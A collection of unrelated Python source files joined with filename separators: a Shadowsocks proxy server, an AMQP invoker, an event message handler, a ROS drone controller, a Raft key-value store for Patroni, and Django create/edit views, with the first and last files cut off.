from util import create_connection, getaddrinfo, parse_hostport, get_ip_address
class ShadowsocksServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
allow_reuse_address = True
def __init__(self, serverinfo, RequestHandlerClass, bind_and_activate=True):
self.serverinfo = serverinfo
p = urlparse.urlparse(serverinfo)
encrypt.check(p.password, p.username)
self.key, self.method = p.password, p.username
self.aports = [int(k) for k in urlparse.parse_qs(p.query).get('ports', [''])[0].split(',') if k.isdigit()]
reverse = urlparse.parse_qs(p.query).get('reverse', [''])[0]
self.reverse = parse_hostport(reverse) if reverse else None
addrs = getaddrinfo(p.hostname, p.port)
if not addrs:
raise ValueError('cant resolve listen address')
self.address_family = addrs[0][0]
server_address = (p.hostname, p.port)
SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate=bind_and_activate)
def server_activate(self):
self.socket.listen(self.request_queue_size)
class Socks5Server(SocketServer.StreamRequestHandler):
timeout = 20
bufsize = 8192
def handle_tcp(self, local, remote, timeout=60):
try:
fdset = [local, remote]
while fdset:
r, w, e = select.select(fdset, [], [], timeout)
if not r:
logging.debug('read time out')
break
if local in r:
data = local.recv(self.bufsize)
if not data:
remote.shutdown(socket.SHUT_WR)
local.shutdown(socket.SHUT_RD)
fdset.remove(local)
else:
remote.sendall(self.decrypt(data))
if remote in r:
data = remote.recv(self.bufsize)
if not data:
local.shutdown(socket.SHUT_WR)
remote.shutdown(socket.SHUT_RD)
fdset.remove(remote)
else:
local.sendall(self.encrypt(data))
finally:
local.close()
remote.close()
def encrypt(self, data):
return self.encryptor.encrypt(data)
def decrypt(self, data):
return self.encryptor.decrypt(data)
def _request_is_loopback(self, req):
try:
return get_ip_address(req[0]).is_loopback
except Exception:
pass
def handle(self):
self.remote = None
try:
self.encryptor = encrypt.Encryptor(self.server.key, self.server.method, servermode=True)
sock = self.connection
# sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
iv_len = self.encryptor.iv_len()
if iv_len:
try:
self.decrypt(self.rfile.read(iv_len))
except ValueError:
logging.warn('server %s:%d iv reused, possible replay attrack. closing...' % self.server.server_address)
return
data = sock.recv(1)
if not data:
return
addrtype = ord(self.decrypt(data))
if addrtype == 1:
addr = socket.inet_ntoa(self.decrypt(self.rfile.read(4)))
elif addrtype == 3:
addr = self.decrypt(self.rfile.read(ord(self.decrypt(self.rfile.read(1)))))
elif addrtype == 4:
addr = socket.inet_ntop(socket.AF_INET6, self.decrypt(self.rfile.read(16)))
else: # not supported
logging.warn('server %s:%d addr_type not supported, maybe wrong password' % self.server.server_address)
return
port = struct.unpack('>H', self.decrypt(self.rfile.read(2)))[0]
if self.server.aports and port not in self.server.aports:
logging.info('server %s:%d port %d not allowed' % (self.server.server_address[0], self.server.server_address[1], port))
return
if self._request_is_loopback((addr, port)):
logging.info('server %s:%d localhost access denied' % self.server.server_address)
return
try:
logging.info('server %s:%d request %s:%d from %s:%d' % (self.server.server_address[0], self.server.server_address[1],
addr, port, self.client_address[0], self.client_address[1]))
data = self.decrypt(sock.recv(self.bufsize))
if self.server.reverse:
if data.startswith((b'GET', b'POST', b'HEAD', b'PUT', b'DELETE', b'TRACE', b'OPTIONS', b'PATCH', b'CONNECT')) and b'HTTP/1' in data and b'\r\n' in data:
data = data.decode('latin1')
data = data.replace('\r\n', '\r\nss-realip: %s:%s\r\nss-client: %s\r\n' % (self.client_address[0], self.client_address[1], self.server.key), 1)
self.remote = create_connection(self.server.reverse, timeout=10)
else:
a = 'CONNECT %s:%d HTTP/1.0\r\nss-realip: %s:%s\r\nss-client: %s\r\n\r\n' % (addr, port, self.client_address[0], self.client_address[1], self.server.key)
self.remote = create_connection(self.server.reverse, timeout=10)
self.remote.sendall(a.encode('latin1'))
remoterfile = self.remote.makefile('rb', 0)
d = remoterfile.readline()
while d not in (b'\r\n', b'\n', b'\r'):
if not d:
raise IOError(0, 'remote closed')
d = remoterfile.readline()
if not self.remote:
self.remote = create_connection((addr, port), timeout=10)
self.remote.sendall(data)
# self.remote.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except (IOError, OSError) as e: # Connection refused
logging.warn('server %s:%d %r on connecting %s:%d' % (self.server.server_address[0], self.server.server_address[1], e, addr, port))
return
self.handle_tcp(sock, self.remote)
except socket.error as e:
logging.warn('server %s:%d %r' % (self.server.server_address[0], self.server.server_address[1], e))
def finish(self):
SocketServer.StreamRequestHandler.finish(self)
if self.remote:
self.remote.close()
def start_servers(config):
for serverinfo in config:
try:
logging.info('starting server: %s' % serverinfo)
ssserver = ShadowsocksServer(serverinfo, Socks5Server)
threading.Thread(target=ssserver.serve_forever).start()
except Exception as e:
logging.error('something wrong with config: %r' % e)
def main():
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S', filemode='a+')
hello = 'shadowsocks-server %s' % __version__
if gevent:
hello += ' with gevent %s' % gevent.__version__
print(hello)
print('by v3aqb')
config_path = None
server = None
if os.path.exists(os.path.join(os.path.dirname(__file__), 'config.json')):
config_path = os.path.join(os.path.dirname(__file__), 'config.json')
try:
optlist, args = getopt.getopt(sys.argv[1:], 'c:f:')
for key, value in optlist:
if key == '-f':
config_path = value
if key == '-c':
server = value
if server:
config = [server]
elif config_path:
logging.info('loading config from %s' % config_path)
with open(config_path, 'rb') as f:
try:
config = json.load(f)
except ValueError as e:
logging.error('found an error in config.json: %s', e.message)
sys.exit(1)
else:
config = ['ss://aes-256-cfb:barfoo!@127.0.0.1:8388', ]
except getopt.GetoptError:
sys.exit(2)
start_servers(config)
if __name__ == '__main__':
try:
main()
except socket.error as e:
logging.error(e)
except KeyboardInterrupt:
sys.exit(0)
|
amqp_invoker.py
|
"""Summary."""
import datetime
import logging
import signal
import socket
import threading
from contextlib import contextmanager
from typing import Callable, Dict
from urllib.parse import urlparse
import kombu
import kombu.exceptions
import kombu.message
from kombu.pools import producers
from ergo.function_invocable import FunctionInvocable
from ergo.invoker import Invoker
from ergo.message import Message, decodes, encodes
from ergo.topic import PubTopic, SubTopic
from ergo.util import extract_from_stack, instance_id
logger = logging.getLogger(__name__)
PREFETCH_COUNT = 1
TERMINATION_GRACE_PERIOD = 60 # seconds
# rabbitmq's recommended default https://www.rabbitmq.com/heartbeats.html#heartbeats-timeout
DEFAULT_HEARTBEAT = 60 # seconds.
def set_param(host: str, param_key: str, param_val: str) -> str:
"""Overwrite a param in a host string w a new value."""
uri, new_param = urlparse(host), f'{param_key}={param_val}'
params = [p for p in uri.query.split('&') if param_key not in p] + [new_param]
return uri._replace(query='&'.join(params)).geturl()
def make_error_output(err: Exception) -> Dict[str, str]:
"""Make a more digestible error output."""
orig = err.__context__ or err
err_output = {
'type': type(orig).__name__,
'message': str(orig),
}
filename, lineno, function_name = extract_from_stack(orig)
if None not in (filename, lineno, function_name):
err_output = {**err_output, 'file': filename, 'line': lineno, 'func': function_name}
return err_output
class AmqpInvoker(Invoker):
"""Summary."""
def __init__(self, invocable: FunctionInvocable) -> None:
super().__init__(invocable)
heartbeat = self._invocable.config.heartbeat or DEFAULT_HEARTBEAT
self._connection = kombu.Connection(self._invocable.config.host, heartbeat=heartbeat)
self._exchange = kombu.Exchange(name=self._invocable.config.exchange, type="topic", durable=True, auto_delete=False)
component_queue_name = f"{self._invocable.config.func}".replace("/", ":")
if component_queue_name.startswith(":"):
component_queue_name = component_queue_name[1:]
self._component_queue = kombu.Queue(name=component_queue_name, exchange=self._exchange, routing_key=str(SubTopic(self._invocable.config.subtopic)), durable=True)
instance_queue_name = f"{component_queue_name}:{instance_id()}"
self._instance_queue = kombu.Queue(name=instance_queue_name, exchange=self._exchange, routing_key=str(SubTopic(instance_id())), auto_delete=True)
error_queue_name = f"{component_queue_name}:error"
self._error_queue = kombu.Queue(name=error_queue_name, exchange=self._exchange, routing_key=error_queue_name, durable=False)
self._terminating = threading.Event()
self._pending_invocations = threading.Semaphore()
self._handler_lock = threading.Lock()
def start(self) -> int:
signal.signal(signal.SIGTERM, self._shutdown)
signal.signal(signal.SIGINT, self._shutdown)
with self._connection:
conn = self._connection
consumer: kombu.Consumer = conn.Consumer(queues=[self._component_queue, self._instance_queue], prefetch_count=PREFETCH_COUNT, accept=["json"])
consumer.register_callback(self._start_handle_message_thread)
consumer.consume()
while not self._terminating.is_set():
try:
# wait up to 1s for the next message before sending a heartbeat
conn.drain_events(timeout=1)
except socket.timeout:
conn.heartbeat_check()
except conn.recoverable_connection_errors:
if self._terminating.is_set():
continue
logger.warning("connection closed. reviving.")
conn = self._connection.clone()
conn.ensure_connection()
consumer.revive(conn.channel())
consumer.consume()
return 0
def _start_handle_message_thread(self, body: str, message: kombu.message.Message):
# _handle_sigterm will wait for _handle_message to release this semaphore
self._pending_invocations.acquire(blocking=False)
threading.Thread(target=self._handle_message, args=(body, message.ack)).start()
def _handle_message(self, body: str, ack: Callable):
# there may be up to PREFETCH_COUNT _handle_message threads alive at a time, but we want them to execute
# sequentially to guarantee that messages are acknowledged in the order they're received
with self._handler_lock:
try:
ergo_message = decodes(body)
self._handle_message_inner(ergo_message)
finally:
ack()
self._pending_invocations.release()
def _handle_message_inner(self, message_in: Message):
try:
for message_out in self.invoke_handler(message_in):
routing_key = str(PubTopic(message_out.key))
self._publish(message_out, routing_key)
except Exception as err: # pylint: disable=broad-except
dt = datetime.datetime.now(datetime.timezone.utc)
message_in.error = make_error_output(err)
message_in.traceback = str(err)
message_in.scope.metadata['timestamp'] = dt.isoformat()
self._publish(message_in, self._error_queue.name)
def _publish(self, ergo_message: Message, routing_key: str):
amqp_message = encodes(ergo_message).encode("utf-8")
with self._producer() as producer:
producer.publish(
amqp_message,
content_encoding="binary",
exchange=self._exchange,
routing_key=routing_key,
retry=True,
declare=[self._instance_queue, self._error_queue],
)
@contextmanager
def _producer(self) -> kombu.Producer:
with producers[self._connection].acquire(block=True) as conn:
yield conn
def _shutdown(self, signum, *_):
self._terminating.set()
self._pending_invocations.acquire(blocking=True, timeout=TERMINATION_GRACE_PERIOD)
self._connection.close()
signal.signal(signum, 0)
signal.raise_signal(signum)
|
messagehandler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from HTTPWebSocketsHandler import HTTPWebSocketsHandler
'''
credits:
combined http(s) and websocket server copied from
https://github.com/PyOCL/httpwebsockethandler
The MIT License (MIT)
Copyright (c) 2015 Seven Watt
'''
import sys
import os
import queue
import copy
from threading import Thread, Lock
import defaults
class EventListener:
''' stores event listener specific data
'''
def __init__(self, name, priority, event_handler):
self.name = name
self.priority = priority
self.event_handler = event_handler
class QueryHandler:
''' stores query handler specific data
'''
def __init__(self, name, priority, query_handler):
self.name = name
self.priority = priority
self.query_handler = query_handler
class QueueEvent:
''' stores event specific data
'''
def __init__(self, user, ev_type, data):
self.user = user
self.type = ev_type
self.data = data
class Query:
''' stores query specific data
'''
def __init__(self, user, qu_type, params,unlimed_nr_of_results=False):
self.user = user
self.type = qu_type
self.unlimed_nr_of_results = unlimed_nr_of_results
self.params = params
class MessageHandler:
'''does the event- based message handling
'''
def __init__(self, modref):
self.event_listeners = []
self.query_handlers = []
self.modref = modref
self.queue = queue.Queue() # data queue
self.mutex = Lock() # prepare lock for atomar data changes
self.th = Thread(target=self.run)
# Start the thread
self.th.setDaemon(True)
self.th.start()
def run(self):
''' endless thread loop to distribute all incoming events to all eventlistener
'''
print("message handler thread loop")
while True:
queue_event = self.queue.get(
block=True) # waits for incoming queue_event objects
for event_handler in self.event_listeners:
# allows the handler to modify the event (just for later extensions :-)
queue_event = event_handler.event_handler(queue_event)
if not queue_event: # if eventhandler returns Null, then no further message handling
break
def add_event_handler(self, name, priority, event_handler):
self.mutex.acquire() # avoid thread interfearence
self.event_listeners.append(
EventListener(name, priority, event_handler))
# release the mutex lock
self.mutex.release()
def add_query_handler(self, name, priority, query_handler):
self.mutex.acquire() # avoid thread interfearence
self.query_handlers.append(
QueryHandler(name, priority, query_handler))
# release the mutex lock
self.mutex.release()
def queue_event(self, owner, ev_type, data):
self.queue.put(QueueEvent(owner, ev_type, data))
def queue_event_obj(self, queue_event):
self.queue.put(queue_event)
def query(self, query):
res = []
query_start_page = 0
try:
if 'query_start_page' in query.params and query.params['query_start_page'] >= 0:
query_start_page = query.params['query_start_page']
except:
pass # see'm not to have a page number....
if query.unlimed_nr_of_results:
for query_handler in self.query_handlers:
all_received = False
query_start_size = 1
this_res = []
while not all_received:
this_res = query_handler.query_handler(query,
defaults.MAX_QUERY_SIZE*query_start_size+1)
# there are more result
all_received = len(
this_res) <= defaults.MAX_QUERY_SIZE*query_start_size
query_start_size *= 2 # double the block size for another loop, if needed
res += this_res
return res
else:
for query_handler in self.query_handlers:
# returns one result more as dictated by MAX_QUERY_SIZE to indicate that there are some more results
if defaults.MAX_QUERY_SIZE*(query_start_page+1)-len(res) < 0:
break
res += query_handler.query_handler(query,
defaults.MAX_QUERY_SIZE*(query_start_page+1)-len(res)+1) # max. + 1
# returns one result more as dictated by MAX_QUERY_SIZE to indicate that there are some more results
return res[defaults.MAX_QUERY_SIZE*query_start_page:defaults.MAX_QUERY_SIZE*(query_start_page+1)+1]
|
controller.py
|
#!/usr/bin/env python
import rospy
import geometry_msgs.msg
import mavros_msgs.srv
import mavros_msgs.msg
import ursa.srv
import tf2_ros
import tf2_geometry_msgs
import threading
import nav_msgs.msg
setpoint = geometry_msgs.msg.TransformStamped()
takeOff=False
tf_buffer = tf2_ros.Buffer(rospy.Duration(10.0)) #tf buffer length
def set_position_thread():
rate = rospy.Rate(20)
br = tf2_ros.TransformBroadcaster()
while True:
setpoint.header.stamp = rospy.Time.now()
br.sendTransform(setpoint)
rate.sleep()
def setpoint_land():
setpoint.transform.translation.z = -0.1
rospy.sleep(4)
if takeOff == False:
arm(False)
def handle_takeoff_land(data):
global setpoint
global takeOff
if data.takeoff and data.height <= 0.99:
setpoint.transform.translation.z=data.height
set_mode(0, "OFFBOARD")
arm(True)
takeOff = True
return ursa.srv.TakeoffLandResponse(1)
elif data.height>2.5:
return ursa.srv.TakeoffLandResponse(-1)
elif not data.takeoff:
t = threading.Thread(target=setpoint_land)
t.daemon = True
takeOff = False
t.start()
return ursa.srv.TakeoffLandResponse(1)
def waypointCB(data):
global setpoint
transform = tf_buffer.lookup_transform("map",
data.header.frame_id, #source frame
rospy.Time(0), #get the tf at first available time
rospy.Duration(1.0)) #wait for 1 second
# If goal is inside robot foot print then setpoint as goal opposed to local plan
# Commented out in response to issue #2. Set local planner orientation in trajectory generator when inside robot radius.
# if (((current_pose.pose.position.x - robot_radius) < global_plan_endpoint.pose.position.x) and
# (global_plan_endpoint.pose.position.x < (current_pose.pose.position.x + robot_radius)) and
# ((current_pose.pose.position.y - robot_radius) < global_plan_endpoint.pose.position.y) and
# (global_plan_endpoint.pose.position.y < (current_pose.pose.position.y + robot_radius))):
# mapPose = global_plan_endpoint
# else:
# mapPose = tf2_geometry_msgs.do_transform_pose(data.poses[-1], transform)
mapPose = tf2_geometry_msgs.do_transform_pose(data, transform)
setpoint.transform.translation.x = mapPose.pose.position.x
setpoint.transform.translation.y = mapPose.pose.position.y
setpoint.transform.rotation.x = mapPose.pose.orientation.x
setpoint.transform.rotation.y = mapPose.pose.orientation.y
setpoint.transform.rotation.z = mapPose.pose.orientation.z
setpoint.transform.rotation.w = mapPose.pose.orientation.w
if __name__ == '__main__':
rospy.init_node('ursa_controller', anonymous=True)
rate = rospy.Rate(20)
# Init setpoint xform
setpoint.header.frame_id = "map"
setpoint.child_frame_id = "setpoint"
setpoint.transform.rotation.w = 1
# listen for nav stuff
local_plan_sub = rospy.Subscriber('/ursa_target', geometry_msgs.msg.PoseStamped, waypointCB, queue_size=10)
# setup services as client
set_mode = rospy.ServiceProxy('/mavros/set_mode', mavros_msgs.srv.SetMode)
arm = rospy.ServiceProxy('/mavros/cmd/arming', mavros_msgs.srv.CommandBool)
# setup services as server
rospy.Service('ursa_takeoff_land', ursa.srv.TakeoffLand, handle_takeoff_land)
# start tf publisher thread
t = threading.Thread(target=set_position_thread)
t.start()
rospy.spin()
|
raft.py
|
import json
import logging
import os
import threading
import time
from pysyncobj import SyncObj, SyncObjConf, replicated, FAIL_REASON
from pysyncobj.transport import TCPTransport, CONNECTION_STATE
from pysyncobj.utility import TcpUtility, UtilityException
from . import AbstractDCS, ClusterConfig, Cluster, Failover, Leader, Member, SyncState, TimelineHistory
from ..utils import validate_directory
logger = logging.getLogger(__name__)
class _TCPTransport(TCPTransport):
def __init__(self, syncObj, selfNode, otherNodes):
super(_TCPTransport, self).__init__(syncObj, selfNode, otherNodes)
self.setOnUtilityMessageCallback('members', syncObj.getMembers)
class SyncObjUtility(object):
def __init__(self, otherNodes, conf):
self._nodes = otherNodes
self._utility = TcpUtility(conf.password)
def executeCommand(self, command):
try:
return self._utility.executeCommand(self.__node, command)
except UtilityException:
return None
def getMembers(self):
for self.__node in self._nodes:
response = self.executeCommand(['members'])
if response:
return [member['addr'] for member in response]
class DynMemberSyncObj(SyncObj):
def __init__(self, selfAddress, partnerAddrs, conf):
self.__early_apply_local_log = selfAddress is not None
self.applied_local_log = False
utility = SyncObjUtility(partnerAddrs, conf)
members = utility.getMembers()
add_self = members and selfAddress not in members
partnerAddrs = [member for member in (members or partnerAddrs) if member != selfAddress]
super(DynMemberSyncObj, self).__init__(selfAddress, partnerAddrs, conf, transportClass=_TCPTransport)
if add_self:
thread = threading.Thread(target=utility.executeCommand, args=(['add', selfAddress],))
thread.daemon = True
thread.start()
def getMembers(self, args, callback):
callback([{'addr': node.id, 'leader': node == self._getLeader(), 'status': CONNECTION_STATE.CONNECTED
if self.isNodeConnected(node) else CONNECTION_STATE.DISCONNECTED} for node in self.otherNodes] +
[{'addr': self.selfNode.id, 'leader': self._isLeader(), 'status': CONNECTION_STATE.CONNECTED}], None)
def _onTick(self, timeToWait=0.0):
super(DynMemberSyncObj, self)._onTick(timeToWait)
# The SyncObj calls onReady callback only when cluster got the leader and is ready for writes.
# In some cases for us it is safe to "signal" the Raft object when the local log is fully applied.
# We are using the `applied_local_log` property for that, but not calling the callback function.
if self.__early_apply_local_log and not self.applied_local_log and self.raftLastApplied == self.raftCommitIndex:
self.applied_local_log = True
class KVStoreTTL(DynMemberSyncObj):
def __init__(self, on_ready, on_set, on_delete, **config):
self.__thread = None
self.__on_set = on_set
self.__on_delete = on_delete
self.__limb = {}
self.__retry_timeout = None
self_addr = config.get('self_addr')
partner_addrs = set(config.get('partner_addrs', []))
if config.get('patronictl'):
if self_addr:
partner_addrs.add(self_addr)
self_addr = None
# Create raft data_dir if necessary
raft_data_dir = config.get('data_dir', '')
if raft_data_dir != '':
validate_directory(raft_data_dir)
file_template = (self_addr or '')
file_template = file_template.replace(':', '_') if os.name == 'nt' else file_template
file_template = os.path.join(raft_data_dir, file_template)
conf = SyncObjConf(password=config.get('password'), autoTick=False, appendEntriesUseBatch=False,
bindAddress=config.get('bind_addr'), commandsWaitLeader=config.get('commandsWaitLeader'),
fullDumpFile=(file_template + '.dump' if self_addr else None),
journalFile=(file_template + '.journal' if self_addr else None),
onReady=on_ready, dynamicMembershipChange=True)
super(KVStoreTTL, self).__init__(self_addr, partner_addrs, conf)
self.__data = {}
@staticmethod
def __check_requirements(old_value, **kwargs):
return ('prevExist' not in kwargs or bool(kwargs['prevExist']) == bool(old_value)) and \
('prevValue' not in kwargs or old_value and old_value['value'] == kwargs['prevValue']) and \
(not kwargs.get('prevIndex') or old_value and old_value['index'] == kwargs['prevIndex'])
def set_retry_timeout(self, retry_timeout):
self.__retry_timeout = retry_timeout
def retry(self, func, *args, **kwargs):
event = threading.Event()
ret = {'result': None, 'error': -1}
def callback(result, error):
ret.update(result=result, error=error)
event.set()
kwargs['callback'] = callback
timeout = kwargs.pop('timeout', None) or self.__retry_timeout
deadline = timeout and time.time() + timeout
while True:
event.clear()
func(*args, **kwargs)
event.wait(timeout)
if ret['error'] == FAIL_REASON.SUCCESS:
return ret['result']
elif ret['error'] == FAIL_REASON.REQUEST_DENIED:
break
elif deadline:
timeout = deadline - time.time()
if timeout <= 0:
break
time.sleep(1)
return False
@replicated
def _set(self, key, value, **kwargs):
old_value = self.__data.get(key, {})
if not self.__check_requirements(old_value, **kwargs):
return False
if old_value and old_value['created'] != value['created']:
value['created'] = value['updated']
value['index'] = self.raftLastApplied + 1
self.__data[key] = value
if self.__on_set:
self.__on_set(key, value)
return True
def set(self, key, value, ttl=None, **kwargs):
old_value = self.__data.get(key, {})
if not self.__check_requirements(old_value, **kwargs):
return False
value = {'value': value, 'updated': time.time()}
value['created'] = old_value.get('created', value['updated'])
if ttl:
value['expire'] = value['updated'] + ttl
return self.retry(self._set, key, value, **kwargs)
def __pop(self, key):
self.__data.pop(key)
if self.__on_delete:
self.__on_delete(key)
@replicated
def _delete(self, key, recursive=False, **kwargs):
if recursive:
for k in list(self.__data.keys()):
if k.startswith(key):
self.__pop(k)
elif not self.__check_requirements(self.__data.get(key, {}), **kwargs):
return False
else:
self.__pop(key)
return True
def delete(self, key, recursive=False, **kwargs):
if not recursive and not self.__check_requirements(self.__data.get(key, {}), **kwargs):
return False
return self.retry(self._delete, key, recursive=recursive, **kwargs)
@staticmethod
def __values_match(old, new):
return all(old.get(n) == new.get(n) for n in ('created', 'updated', 'expire', 'value'))
@replicated
def _expire(self, key, value, callback=None):
current = self.__data.get(key)
if current and self.__values_match(current, value):
self.__pop(key)
def __expire_keys(self):
for key, value in self.__data.items():
if value and 'expire' in value and value['expire'] <= time.time() and \
not (key in self.__limb and self.__values_match(self.__limb[key], value)):
self.__limb[key] = value
def callback(*args):
if key in self.__limb and self.__values_match(self.__limb[key], value):
self.__limb.pop(key)
self._expire(key, value, callback=callback)
def get(self, key, recursive=False):
if not recursive:
return self.__data.get(key)
return {k: v for k, v in self.__data.items() if k.startswith(key)}
def _onTick(self, timeToWait=0.0):
super(KVStoreTTL, self)._onTick(timeToWait)
if self._isLeader():
self.__expire_keys()
else:
self.__limb.clear()
def _autoTickThread(self):
self.__destroying = False
while not self.__destroying:
self.doTick(self.conf.autoTickPeriod)
def startAutoTick(self):
self.__thread = threading.Thread(target=self._autoTickThread)
self.__thread.daemon = True
self.__thread.start()
def destroy(self):
if self.__thread:
self.__destroying = True
self.__thread.join()
super(KVStoreTTL, self).destroy()
class Raft(AbstractDCS):
def __init__(self, config):
super(Raft, self).__init__(config)
self._ttl = int(config.get('ttl') or 30)
ready_event = threading.Event()
self._sync_obj = KVStoreTTL(ready_event.set, self._on_set, self._on_delete, commandsWaitLeader=False, **config)
self._sync_obj.startAutoTick()
while True:
ready_event.wait(5)
if ready_event.isSet() or self._sync_obj.applied_local_log:
break
else:
logger.info('waiting on raft')
self.set_retry_timeout(int(config.get('retry_timeout') or 10))
def _on_set(self, key, value):
leader = (self._sync_obj.get(self.leader_path) or {}).get('value')
if key == value['created'] == value['updated'] and \
(key.startswith(self.members_path) or key == self.leader_path and leader != self._name) or \
key == self.leader_optime_path and leader != self._name or key in (self.config_path, self.sync_path):
self.event.set()
def _on_delete(self, key):
if key == self.leader_path:
self.event.set()
def set_ttl(self, ttl):
self._ttl = ttl
@property
def ttl(self):
return self._ttl
def set_retry_timeout(self, retry_timeout):
self._sync_obj.set_retry_timeout(retry_timeout)
@staticmethod
def member(key, value):
return Member.from_node(value['index'], os.path.basename(key), None, value['value'])
def _load_cluster(self):
prefix = self.client_path('')
response = self._sync_obj.get(prefix, recursive=True)
if not response:
return Cluster(None, None, None, None, [], None, None, None, None)
nodes = {os.path.relpath(key, prefix).replace('\\', '/'): value for key, value in response.items()}
# get initialize flag
initialize = nodes.get(self._INITIALIZE)
initialize = initialize and initialize['value']
# get global dynamic configuration
config = nodes.get(self._CONFIG)
config = config and ClusterConfig.from_node(config['index'], config['value'])
# get timeline history
history = nodes.get(self._HISTORY)
history = history and TimelineHistory.from_node(history['index'], history['value'])
# get last know leader lsn and slots
status = nodes.get(self._STATUS)
if status:
try:
status = json.loads(status['value'])
last_lsn = status.get(self._OPTIME)
slots = status.get('slots')
except Exception:
slots = last_lsn = None
else:
last_lsn = nodes.get(self._LEADER_OPTIME)
last_lsn = last_lsn and last_lsn['value']
slots = None
try:
last_lsn = int(last_lsn)
except Exception:
last_lsn = 0
# get list of members
members = [self.member(k, n) for k, n in nodes.items() if k.startswith(self._MEMBERS) and k.count('/') == 1]
# get leader
leader = nodes.get(self._LEADER)
if leader:
member = Member(-1, leader['value'], None, {})
member = ([m for m in members if m.name == leader['value']] or [member])[0]
leader = Leader(leader['index'], None, member)
# failover key
failover = nodes.get(self._FAILOVER)
if failover:
failover = Failover.from_node(failover['index'], failover['value'])
# get synchronization state
sync = nodes.get(self._SYNC)
sync = SyncState.from_node(sync and sync['index'], sync and sync['value'])
return Cluster(initialize, config, leader, last_lsn, members, failover, sync, history, slots)
def _write_leader_optime(self, last_lsn):
return self._sync_obj.set(self.leader_optime_path, last_lsn, timeout=1)
def _write_status(self, value):
return self._sync_obj.set(self.status_path, value, timeout=1)
def _update_leader(self):
ret = self._sync_obj.set(self.leader_path, self._name, ttl=self._ttl, prevValue=self._name)
if not ret and self._sync_obj.get(self.leader_path) is None:
ret = self.attempt_to_acquire_leader()
return ret
def attempt_to_acquire_leader(self, permanent=False):
return self._sync_obj.set(self.leader_path, self._name, prevExist=False,
ttl=None if permanent else self._ttl)
def set_failover_value(self, value, index=None):
return self._sync_obj.set(self.failover_path, value, prevIndex=index)
def set_config_value(self, value, index=None):
return self._sync_obj.set(self.config_path, value, prevIndex=index)
def touch_member(self, data, permanent=False):
data = json.dumps(data, separators=(',', ':'))
return self._sync_obj.set(self.member_path, data, None if permanent else self._ttl, timeout=2)
def take_leader(self):
return self._sync_obj.set(self.leader_path, self._name, ttl=self._ttl)
def initialize(self, create_new=True, sysid=''):
return self._sync_obj.set(self.initialize_path, sysid, prevExist=(not create_new))
def _delete_leader(self):
return self._sync_obj.delete(self.leader_path, prevValue=self._name, timeout=1)
def cancel_initialization(self):
return self._sync_obj.delete(self.initialize_path)
def delete_cluster(self):
return self._sync_obj.delete(self.client_path(''), recursive=True)
def set_history_value(self, value):
return self._sync_obj.set(self.history_path, value)
def set_sync_state_value(self, value, index=None):
return self._sync_obj.set(self.sync_path, value, prevIndex=index)
def delete_sync_state(self, index=None):
return self._sync_obj.delete(self.sync_path, prevIndex=index)
def watch(self, leader_index, timeout):
try:
return super(Raft, self).watch(leader_index, timeout)
finally:
self.event.clear()
|
edit.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
try:
import simplejson as json
except ImportError:
import json
from threading import Thread
from django.db import models
from django.http import JsonResponse
from django.contrib import messages
from django.forms.models import model_to_dict, construct_instance
from django.contrib.auth.mixins import PermissionRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.utils.module_loading import import_string
from django.utils.encoding import force_text
from django.views.generic.edit import CreateView, UpdateView
# Create your views here.
from idcops.models import User
from idcops.mixins import BaseRequiredMixin, PostRedirect
from idcops.lib.utils import make_dict, diff_dict, get_content_type_for_model
from idcops.lib.tasks import log_action, device_post_save
class NewModelView(BaseRequiredMixin, PermissionRequiredMixin,
PostRedirect, SuccessMessageMixin, CreateView):
def get_template_names(self):
prefix = self.model_name
if self.request.is_ajax():
return ["{0}/ajax_new.html".format(prefix), "base/ajax_new.html"]
else:
return ["{0}/new.html".format(prefix), "base/new.html"]
def get_permission_required(self):
self.permission_required = 'idcops.add_%s' % (self.model_name)
return super(NewModelView, self).get_permission_required()
def handle_no_permission(self):
messages.error(self.request, "您没有新建 {0} 的权限.".format(
self.model._meta.verbose_name))
return super(NewModelView, self).handle_no_permission()
def get_success_message(self, cleaned_data):
self.success_message = "成功创建了 {} {}".format(
self.verbose_name, self.object
)
return self.success_message
def get_form_class(self):
name = self.model_name.capitalize()
try:
form_class_path = "idcops.forms.{}NewForm".format(name)
self.form_class = import_string(form_class_path)
except BaseException:
form_class_path = "idcops.forms.{}Form".format(name)
self.form_class = import_string(form_class_path)
return self.form_class
def get_form_kwargs(self):
kwargs = super(NewModelView, self).get_form_kwargs()
params = self.request.GET.dict()
mfields = [f.attname for f in self.opts.fields]
for k in params.keys():
if k in mfields:
kwargs.update({k: params[k]})
related_models = []
for f in self.opts.get_fields():
if isinstance(f, (models.ForeignKey, models.ManyToManyField)):
if f.related_model:
related_models.append(f.related_model)
if User in related_models:
kwargs.update({'user': self.request.user})
return kwargs
def form_valid(self, form):
form.instance.creator = self.request.user
if 'onidc' not in form.cleaned_data:
form.instance.onidc = self.request.user.onidc
response = super(NewModelView, self).form_valid(form)
log_action(
user_id=self.request.user.pk,
content_type_id=get_content_type_for_model(self.object, True).pk,
object_id=self.object.pk,
action_flag="新增"
)
if self.model_name == 'online':
verify = Thread(target=device_post_save, args=(self.object.pk,))
verify.start()
if self.request.is_ajax():
data = {
'message': "Successfully submitted form data.",
'data': form.cleaned_data
}
return JsonResponse(data)
else:
return response
def get_context_data(self, **kwargs):
context = super(NewModelView, self).get_context_data(**kwargs)
return context
class EditModelView(BaseRequiredMixin, PermissionRequiredMixin,
PostRedirect, SuccessMessageMixin, UpdateView):
def get_template_names(self):
prefix = self.model_name
if self.request.is_ajax():
return ["{0}/ajax_edit.html".format(prefix), "base/ajax_edit.html"]
else:
return ["{0}/edit.html".format(prefix), "base/edit.html"]
def get_permission_required(self):
self.permission_required = 'idcops.change_%s' % (self.model_name)
return super(EditModelView, self).get_permission_required()
def handle_no_permission(self):
messages.error(self.request, "您没有修改 {0} 的权限.".format(
self.model._meta.verbose_name))
return super(EditModelView, self).handle_no_permission()
def get_success_message(self, cleaned_data):
self.success_message = '成功修改了 {0} "{1}"'.format(
self.model._meta.verbose_name, force_text(self.object)
)
